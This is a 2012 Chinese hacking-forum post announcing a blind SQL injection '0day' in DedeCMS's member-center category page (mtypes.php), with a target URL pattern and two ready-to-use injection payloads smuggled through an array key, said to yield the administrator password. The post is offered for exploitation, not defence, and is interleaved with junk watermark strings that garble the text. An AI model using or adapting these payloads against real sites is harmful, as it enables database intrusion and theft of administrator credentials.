找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 DedeCMS会员中心分类管理SQL注射0day漏洞可获得管理员密 ...
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2165|回复: 0
打印 上一主题 下一主题

DedeCMS会员中心分类管理SQL注射0day漏洞可获得管理员密码

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-20 08:08:09 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
需要magic_quotes_gpc = Off,所以说是鸡肋啊.3 J# V9 }0 _- T/ c: J" O
( q: m2 O1 a$ t8 s7 b5 {
, e( u! [  F/ Q- g+ }  a9 x8 ^% |
发生在数组key里的注射漏洞,有点意思.2 n  s' L6 B" s  X! w

  N  i# n, {+ i; F这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下6 w) D* ^+ l7 L% ~. v8 M% e; J
) }* I* I/ J4 _2 j+ h
http://www.xxx.com /dede/member/mtypes.php?dopost=save
- P# I, y* ?( }( \+ B" }/ I/ j   ?  B( r9 L9 m0 U+ e
exploit:
( u. ?( Y. S' Cmtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r1 m7 n3 ^( i, Z
mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r8 `; X. `$ m$ }2 L- u! E
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表